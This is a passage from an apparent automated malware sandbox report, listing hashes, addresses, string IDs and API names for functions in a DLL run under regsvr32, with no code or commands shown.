                                                                    • Instruction Fuzzy Hash: 27811A7050478C8FDBBADF64C8AA7CA7BB0FB59304F504219EA4D8A261DB749749CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00000001800248A8 Relevance: 2.6, Strings: 2, Instructions: 143COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 2Q'$t<p
                                                                    • API String ID: 0-2959822804
                                                                    • Opcode ID: b2351d3b708b15bcd3604af59b95d6174f592116e14d9e00cc8b524fb472ed52
                                                                    • Instruction ID: a41fe1ae69e2ef788ca0c35fa62602b5835247be5e9f8fb85ac316e89f41683a
                                                                    • Opcode Fuzzy Hash: b2351d3b708b15bcd3604af59b95d6174f592116e14d9e00cc8b524fb472ed52
                                                                    • Instruction Fuzzy Hash: 30612671D0074E8BDF99DFA9C44A6EEBBB0FB58344F208119E415B7250CB788A49CF92
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180012F28 Relevance: 2.6, Strings: 2, Instructions: 136COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 95s$\`s
                                                                    • API String ID: 0-3495284040
                                                                    • Opcode ID: 588b54260dd6ab6c7a0d8fdad9ba33054619fea491f2d0c2f65b47850ec72611
                                                                    • Instruction ID: 5af2ad2f129eee824c5b1b43ddda8a3f0e9306f12771263eefccbe9bdf0da5be
                                                                    • Opcode Fuzzy Hash: 588b54260dd6ab6c7a0d8fdad9ba33054619fea491f2d0c2f65b47850ec72611
                                                                    • Instruction Fuzzy Hash: 1351D47011478A8BCB48DF28C896ADE3FA1FB58348F114618FC668B264C7B4E665CBC5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018001AAB8 Relevance: 2.6, Strings: 2, Instructions: 131COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 3*$qMu
                                                                    • API String ID: 0-4093015089
                                                                    • Opcode ID: 99b9b50685954fc4be39463e85dd78448f0e0771904def200121889666665086
                                                                    • Instruction ID: 306475205ddf6f42a3ecfe0a1797163739854d195c0d735865f936de0d0f8307
                                                                    • Opcode Fuzzy Hash: 99b9b50685954fc4be39463e85dd78448f0e0771904def200121889666665086
                                                                    • Instruction Fuzzy Hash: 445122B09147189BCB88CFA8E4CA9CDBBF1FF48354F609119F806A7255DB709984CF95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018002C904 Relevance: 2.6, Strings: 2, Instructions: 112COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #X$"n&E
                                                                    • API String ID: 0-1188898577
                                                                    • Opcode ID: 718f7bd1d94c81876eaad6eeab3da3c9f3f95e6ba8e740bb3013068cec68a803
                                                                    • Instruction ID: 5f040a851564d75eb680569e00f78a68740ad3a482e782991b4ea7036c242a73
                                                                    • Opcode Fuzzy Hash: 718f7bd1d94c81876eaad6eeab3da3c9f3f95e6ba8e740bb3013068cec68a803
                                                                    • Instruction Fuzzy Hash: 3851CEB190038E8FCB48DF68D8865DE7BB1FB48344F018A1DE866AB250D7B4D665CB94
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00000001800176B8 Relevance: 2.6, Strings: 2, Instructions: 102COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Bw~$fy
                                                                    • API String ID: 0-1663007907
                                                                    • Opcode ID: e7fa569085818704a3ff5c3485105d547b9a4184ddd82cedce935b50235ecc40
                                                                    • Instruction ID: 54d1d0e0fa6abfe6c6c31828b0edda1727153ea8c56c584fcf89706de6b20d2b
                                                                    • Opcode Fuzzy Hash: e7fa569085818704a3ff5c3485105d547b9a4184ddd82cedce935b50235ecc40
                                                                    • Instruction Fuzzy Hash: FC51D2B090038A8FCB48CF64C88A5DE7FB1FB48348F51861DFC26AA250D3B4D664CB85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180013150 Relevance: 2.6, Strings: 2, Instructions: 100COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: /0$XyLe
                                                                    • API String ID: 0-3562702181
                                                                    • Opcode ID: fef052e2a4848d8a0e8164d690a85092e4079079a61ad40d2a1be71e95784dc9
                                                                    • Instruction ID: 167cd3e3c855d70dfa0c36df1993a56b415187eb75226b1b3cef09056e291559
                                                                    • Opcode Fuzzy Hash: fef052e2a4848d8a0e8164d690a85092e4079079a61ad40d2a1be71e95784dc9
                                                                    • Instruction Fuzzy Hash: 5751C2B090034E8FDB48DF68C49A5DE7FB0FB68398F20421DE856A6250D37496A4CFC5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00000001800190D4 Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: >I$>I
                                                                    • API String ID: 0-3948471910
                                                                    • Opcode ID: d02b05b08f34d440a9e97d41a427d6483b203c28eb04f5a8f30793fc226f53c2
                                                                    • Instruction ID: a225938552342fdcd3306cc52f41137c6a5b776406488479516cfafb05d577e3
                                                                    • Opcode Fuzzy Hash: d02b05b08f34d440a9e97d41a427d6483b203c28eb04f5a8f30793fc226f53c2
                                                                    • Instruction Fuzzy Hash: 8D41F0B0909B849BC788DF68C18A90AFBE0FBD8704F505A1DF5858B660DBB4D806CF42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018001DA80 Relevance: 2.6, Strings: 2, Instructions: 86COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: {H2}$}i#c
                                                                    • API String ID: 0-1724349491
                                                                    • Opcode ID: 636373f8d11797f15735a76cf3eff043eb60bc28cc3023d18146d874f48b2676
                                                                    • Instruction ID: 37d5b784c44c013357b808598ceb46bd6ed98c7a9730d3ab63b6bf10ba55f6e5
                                                                    • Opcode Fuzzy Hash: 636373f8d11797f15735a76cf3eff043eb60bc28cc3023d18146d874f48b2676
                                                                    • Instruction Fuzzy Hash: 3941EAB190078A8BCF48CF68C89A1DE7BB1FB58358F11461DE866A6250D3B49664CF85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00000001800269B0 Relevance: 2.6, Strings: 2, Instructions: 82COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4V$so
                                                                    • API String ID: 0-1060102820
                                                                    • Opcode ID: d1e906d6139717c906ceb034d8d33f13f0a3d2bdb8d940195440e7af4bdcba37
                                                                    • Instruction ID: d444a7ea2620fcfa6eb466004a6e01db215641729881944e94261e2193751ac2
                                                                    • Opcode Fuzzy Hash: d1e906d6139717c906ceb034d8d33f13f0a3d2bdb8d940195440e7af4bdcba37
                                                                    • Instruction Fuzzy Hash: 8E41BEB180034A8FCB48CF64C88A5DE7FB1FB68398F104619E859A6250D3B4D6A5CFC5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00000001800296EC Relevance: 2.6, Strings: 2, Instructions: 78COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: F+'$O$
                                                                    • API String ID: 0-4064122715
                                                                    • Opcode ID: 65d5816d26685df18d8fe2bf41853c6ad5a30473c75acd7588c5af8b031b1464
                                                                    • Instruction ID: be1e2e71df6ebfdb4da32f29d75cc371dd40c0bd5c05f395d23934970efaee37
                                                                    • Opcode Fuzzy Hash: 65d5816d26685df18d8fe2bf41853c6ad5a30473c75acd7588c5af8b031b1464
                                                                    • Instruction Fuzzy Hash: FD41D6705187848BD3A9DF68C08965EFBF0FB96394F104A1CF68686670C7B6D849CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00000001800121CC Relevance: 2.6, Strings: 2, Instructions: 75COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 1$bO6
                                                                    • API String ID: 0-3242911120
                                                                    • Opcode ID: 9f75d9841d56aa2cc22d310afbf4e4cd48e2e3da52340bc691d74cf5e049a536
                                                                    • Instruction ID: 6601c978ba2416544a7d1ca6fb5225a3b879728eb772ccf04003f68ee897128b
                                                                    • Opcode Fuzzy Hash: 9f75d9841d56aa2cc22d310afbf4e4cd48e2e3da52340bc691d74cf5e049a536
                                                                    • Instruction Fuzzy Hash: 8A3107701187449FC7A8DF68C086A5ABBF0FB9A354F50491DF686C7265C3B2D895CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180019D60 Relevance: 2.6, Strings: 2, Instructions: 68COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: )j-J$\rba
                                                                    • API String ID: 0-105394296
                                                                    • Opcode ID: b27fa7590f58ca7dd2d737508af6f5bc0d6ebd07140c48d4a736306249910364
                                                                    • Instruction ID: 842adb91478ed39572f9e8a80903ac0de563c5eb9e26d75e48c1d2cd82a83531
                                                                    • Opcode Fuzzy Hash: b27fa7590f58ca7dd2d737508af6f5bc0d6ebd07140c48d4a736306249910364
                                                                    • Instruction Fuzzy Hash: 1A31D17080024E8BDF88DF64D48A6DFBFF0FB58788F205219E856A6254D7749694CFC5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180024698 Relevance: 2.6, Strings: 2, Instructions: 67COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 5T$7c
                                                                    • API String ID: 0-2666566123
                                                                    • Opcode ID: 2ae419eb0ff386ee94a2b0b54af6030ef829be62021f352e0c4a6905d27011e8
                                                                    • Instruction ID: ee04dda3efe5c9a307f88871a109fd0823ba75d09644cdd26569aa81abafae9d
                                                                    • Opcode Fuzzy Hash: 2ae419eb0ff386ee94a2b0b54af6030ef829be62021f352e0c4a6905d27011e8
                                                                    • Instruction Fuzzy Hash: 7631E2B051C7808BC358DF68D15A51BFBF1BBCA748F50891CF686866A0D7B6D818CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180017BDC Relevance: 2.6, Strings: 2, Instructions: 60COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ",)x$PX
                                                                    • API String ID: 0-926260526
                                                                    • Opcode ID: f165c3a10a1fa821f16c68d8465b247d8270816cceff94c6b22525474e7640ac
                                                                    • Instruction ID: d5a1e783bdd82888163cb93820b1a52157f2f65bb265271905f807ea8b7abae1
                                                                    • Opcode Fuzzy Hash: f165c3a10a1fa821f16c68d8465b247d8270816cceff94c6b22525474e7640ac
                                                                    • Instruction Fuzzy Hash: DA31A1B091434E8FCB48DF64C88A5DE7FF0FB58398F114619E85AA6250D3B89694CFC5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9BC39C Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: InfoLocale
                                                                    • String ID:
                                                                    • API String ID: 2299586839-0
                                                                    • Opcode ID: 31e1571c4c9480ce99c15a91898bfef815e3c9c5a1e04a4fd1e61da97386d0dc
                                                                    • Instruction ID: 0743f2c05ec127ea06a9c60c40bda2aec9243bb88f9b1dbe77b026b4aaee5de6
                                                                    • Opcode Fuzzy Hash: 31e1571c4c9480ce99c15a91898bfef815e3c9c5a1e04a4fd1e61da97386d0dc
                                                                    • Instruction Fuzzy Hash: 2E119832A0878345EB705F69F47A3FA2251EB887C8F444071DAADCA281DE1CE54A8751
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9BC834 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: EnumLocalesSystem
                                                                    • String ID:
                                                                    • API String ID: 2099609381-0
                                                                    • Opcode ID: aeac2b72f960d353e04b1ec94d2b5deee2ea0aff83e9dab1063ee3790c567d86
                                                                    • Instruction ID: 3b00f558ac713dcdf0019a8d3fa1b66197161f3de8272cddc67edee3f0ef84dc
                                                                    • Opcode Fuzzy Hash: aeac2b72f960d353e04b1ec94d2b5deee2ea0aff83e9dab1063ee3790c567d86
                                                                    • Instruction Fuzzy Hash: 32115172A0870587F7688F31F02E3B936A1EB58B89F044475C62D892C5CF7CD59887C1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9BC8C8 Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • EnumSystemLocalesA.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF8CA9B5A8C), ref: 00007FF8CA9BC8FD
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: EnumLocalesSystem
                                                                    • String ID:
                                                                    • API String ID: 2099609381-0
                                                                    • Opcode ID: 63a91a0b255d2a7e8e8559b933d18d41bbf72777b1d5725641a44dd385286e67
                                                                    • Instruction ID: 0e66fb691967cc1c8b3e748d5c64696bb364e0d3640283738a8e11d1cdcbee4e
                                                                    • Opcode Fuzzy Hash: 63a91a0b255d2a7e8e8559b933d18d41bbf72777b1d5725641a44dd385286e67
                                                                    • Instruction Fuzzy Hash: 55F0A962E087064AF7288F31F42B3B523D1AB98B84F188071C65DC62C6CE7CD5998281
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9BDF3C Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: InfoLocale_getptd
                                                                    • String ID:
                                                                    • API String ID: 3731964398-0
                                                                    • Opcode ID: c55661bbe17e4b16f28eed47b7e85f9fabee07928079620ee3b979cc97ad5c67
                                                                    • Instruction ID: 7d0334deb87ac9ea8887ab786c3ed038461a6b0b25cd2994469639be84142cdc
                                                                    • Opcode Fuzzy Hash: c55661bbe17e4b16f28eed47b7e85f9fabee07928079620ee3b979cc97ad5c67
                                                                    • Instruction Fuzzy Hash: 1CF0B422A187C083D710CB05F00415AA760F7C4BE0F584261EAAD47B59CE2CC846CB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9BE1E8 Relevance: 1.5, APIs: 1, Instructions: 20COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: InfoLocale
                                                                    • String ID:
                                                                    • API String ID: 2299586839-0
                                                                    • Opcode ID: 502a65142465a1b9b121244362b20e71b6ae70508435106b2b95459646a177ab
                                                                    • Instruction ID: a757fefb78bc8ac314013a31d8ffa42343c4a4bd9e747514f021e6f0670636bd
                                                                    • Opcode Fuzzy Hash: 502a65142465a1b9b121244362b20e71b6ae70508435106b2b95459646a177ab
                                                                    • Instruction Fuzzy Hash: 88E06521A0CB8181F730EB10F8673AA2764EF987D8F900271D6AD866A5DE2CD2098B01
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9BC7F4 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: EnumLocalesSystem
                                                                    • String ID:
                                                                    • API String ID: 2099609381-0
                                                                    • Opcode ID: a3acadd2f008454ed6638a5ec196b6424420b15def5e390d94227f08142a8bc9
                                                                    • Instruction ID: c198c31981e6554be5b78fcbaab1a92e0d6d832f86779106a9a96bb2a2ea30b7
                                                                    • Opcode Fuzzy Hash: a3acadd2f008454ed6638a5ec196b6424420b15def5e390d94227f08142a8bc9
                                                                    • Instruction Fuzzy Hash: F4E08667E0470543EB589F61F45A3747251EF98B89F088075CA2C85195DF7CC59AC780
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00000001800125C4 Relevance: 1.5, Strings: 1, Instructions: 239COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: cYte
                                                                    • API String ID: 0-489798635
                                                                    • Opcode ID: 4acd880b1b9242ae3f66c3fdc32505bc5e4dc901df3d7cd7ffb66f12f89e51a1
                                                                    • Instruction ID: 4bcad34f3ef31740aa8133b8dde5a269bb367cd09133d205a83695970592d01c
                                                                    • Opcode Fuzzy Hash: 4acd880b1b9242ae3f66c3fdc32505bc5e4dc901df3d7cd7ffb66f12f89e51a1
                                                                    • Instruction Fuzzy Hash: C4B1E570904A0C9FCB99DFA8D4C96DDBFB1FB48354F908119F806AB294D774998ACF81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018002A9A8 Relevance: 1.5, Strings: 1, Instructions: 221COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Pc
                                                                    • API String ID: 0-2609325410
                                                                    • Opcode ID: 1a0088ecf8094bc96bd3fe6dd6dc82c472572739438acd9534c77a0a59272c42
                                                                    • Instruction ID: 12b923e2fd3f69615379d54222b7898fdcc3de1fee72b8e179f5c4c977b11f8e
                                                                    • Opcode Fuzzy Hash: 1a0088ecf8094bc96bd3fe6dd6dc82c472572739438acd9534c77a0a59272c42
                                                                    • Instruction Fuzzy Hash: 4CC188B6502749CFCB88DF68C69A59E7BF1FF55308F004129FC0A9A660D374D929CB48
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018001ED50 Relevance: 1.5, Strings: 1, Instructions: 205COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: g >
                                                                    • API String ID: 0-3862707646
                                                                    • Opcode ID: ed648581161f49faafb3551504090fa0bdf2ce44a31b7bcfa2a0e2750c151a25
                                                                    • Instruction ID: 455282f08292131e945dcc730a648b96f9dba3dd8fa54dedd401ba7ae830fef0
                                                                    • Opcode Fuzzy Hash: ed648581161f49faafb3551504090fa0bdf2ce44a31b7bcfa2a0e2750c151a25
                                                                    • Instruction Fuzzy Hash: DEA1E5B1604649CFCB98DF28C4896DE7BE0FF48358F41412AFD0A9B255C774DAA8CB85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180018DAC Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 2
                                                                    • API String ID: 0-2012265552
                                                                    • Opcode ID: fb4f60d061479647d3fac6d2f693c32068a5ad75f13adf9d903438d0578f57c4
                                                                    • Instruction ID: 4926f2c2e7b01a1509be6dde787c5073208d3019f4660081853cabf743aa6d2d
                                                                    • Opcode Fuzzy Hash: fb4f60d061479647d3fac6d2f693c32068a5ad75f13adf9d903438d0578f57c4
                                                                    • Instruction Fuzzy Hash: 23A1467490660CDFCB69DFA8C0856CDBBF2FF18344F1081AAE816A7261D774C619CB89
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00000001800288B8 Relevance: 1.4, Strings: 1, Instructions: 190COMMON
